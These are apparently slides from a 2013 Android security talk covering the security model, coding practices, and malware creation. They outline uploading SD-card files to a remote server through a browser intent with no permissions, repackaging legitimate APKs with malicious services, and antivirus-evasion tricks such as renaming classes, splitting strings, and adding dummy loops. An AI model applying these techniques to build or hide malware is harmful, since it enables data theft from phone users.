These slides were presented at GDG MeetUp in Bangalore which was held on 21st September 2013. Uploading the slides to help the people who wanted the slide Deck
2. ./AboutMe.sh
Information Security Researcher
Trainer at BlackHat, OWASP AppSec, ToorCon, SysCan.
Lead Developer of AFE (Android Framework for Exploitation)
Python Lovers
Co-founder of XYSEC (http://xysec.com)
Have found bug in some famous websites including Google, Apple, Microsoft,
Skype, Adobe and many more
Monday, 23 September 13
3. Some Companies I have found Vulnerabilities in .....
And many more...
Monday, 23 September 13
4. ./Agenda
Quick Introduction to Android Internals
Android Security Model
Android Coding Best Practices
Android Malware, Technique, Effectiveness using AFE (Android Framework for
Exploitation)
Small Social Experiment !
Monday, 23 September 13
5. Android Internals.exe
Based on Linux kernel version 3.x (version 2.6 prior to Android 4.0 ICS)
Application runs through Dalvik VM (Dalvik Virtual Machine)
Dalvik VM runs executable files like dex (Dalvik executable) or apk files
apk files are zipped content of Resources, Signatures, classes.dex and
AndroidManifest.xml file
Monday, 23 September 13
6. Android Security Model.txt
Application are sandboxed (Runs with different UID and GID)
Zygote spawns a new process for each Application
Each Application runs with a separate instance of Dalvik VM
Special Permissions are provided to access Hardware API’s
Permissions are mentioned in AndroidManifest.xml file.
Monday, 23 September 13
7. Android Application.apk
Just an Archive !
Written mainly in Java and XML
Multiple Entry-points, such as Activity, Services,
Intents, Content Providers, etc.
Monday, 23 September 13
10. Uploading a sensitive file from SD-Card to
Remote Server without any Permission!
Read Files from
SD-Card
Uploads File to
Remote Server
Upload a file through
Browser
Permission not
Required for
READING files from
SD Card
Opening Browser
through INTENT
doesn’t requires
Permission
Intent(Intent.ACTION_VIEW, Uri.parse("http://google.com/"));
Save theValue in the
GET parameter to a
file in Server
Monday, 23 September 13
12. Android Coding Best Practices
Follow -> http://developer.android.com/guide/practices/index.html
Top 10 Mobile Risks (Outdated) -> https://www.owasp.org/index.php/
Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
Attend more GDG Talks and other Security Conferences
Shoot me a tweet @sunnyrockzzs
Monday, 23 September 13
14. AndroidManifest.xml OMG ! (Contd.)
android:exported= “True” in <provider> will turn into a nightmare !
BTW by default it is “True” if either android:minSdkVersion or
android:targetSdkVersion to “16” or lower. For applications that set either of
these attributes to “17” or higher, the default is “false”.
Monday, 23 September 13
17. Android Malware (Common Features)
Send SMS to premium Number
Subscribe to premium Services
Dial Premium number
Steal messages, contact list, logs
Steal SD-Card files
Auto-respond to attackers’s text messages !
Monday, 23 September 13
18. Creating a Malware.vbs
Use CONTENT PROVIDERS
Make use of CURSORS & SQLITE databases
Write JAVA codes like crazy
Set up Server component
Get frustrated, start from bullet-point one.
Monday, 23 September 13
19. If you don’t have past relationship with JAVA
Monday, 23 September 13
23. “I am not Afraid” - Eminem
Monday, 23 September 13
24. Faking Legitimate Application?
Malware services generally injected in legitimate applications
How to do it?
legitimate apk Smali/Java
Add malicious
services/classes
RecompileFinal malware
Monday, 23 September 13
25. USE AFE TO AUTOMATE !!
Monday, 23 September 13
26. Android Framework for Exploitation.py
To make your life easier !
Find security vulnerabilities in your device+apps
Protect your device against malwares
Create automated malwares/botnets + send the data to a python listener
Inject malicious services in another applications
Use Android Exploits Crypt existing malwares to make them FUD
Monday, 23 September 13
29. Let’s Make it FUD
Matches the signature with its
database
Checks the activity, service and
other class names
checks the names of the variables
Checks the control flow graph
Monday, 23 September 13
30. Let’s Make it FUD
Matches the signature with its
database
Checks the activity, service and
other class names
checks the names of the variables
Checks the control flow graph
Rebuild + Zipalign
Monday, 23 September 13
31. Let’s Make it FUD
Matches the signature with its
database
Checks the activity, service and
other class names
checks the names of the variables
Checks the control flow graph
Modifies the classnames and all its
references within files
Example: Converts com.example.org to com.omg.lol
Monday, 23 September 13
32. Let’s Make it FUD
Matches the signature with its
database
Checks the activity, service and
other class names
checks the names of the variables
Checks the control flow graph
Split variables into two, and
append at runtime
Example:
String a = “hello”
Will now become
String aa = “hel”
String ab = “lo”
String a = aa + ab
Monday, 23 September 13
33. Let’s Make it FUD
Matches the signature with its
database
Checks the activity, service and
other class names
checks the names of the variables
Checks the control flow graph
Add dummy loops to change
CFG
Example:
goto end;
start: //everything in this label will execute, only when it is called
........
end: //everything in this label will execute, only when it is called
goto start;
Monday, 23 September 13
37. ./Conclusion -h
Be safe
Don’t download apps from 3rd party markets
Turn USB debugging OFF
Anti-virus vendors -> Switch to dynamic analysis Focus on BYOD security
We also conduct trainings on Advanced Mobile Hands-on Security/Exploitation
for both Android and iOS
Monday, 23 September 13
38. HEY WAIT!! WHERE IS THE
SOCIAL EXPERIMENT ?
Monday, 23 September 13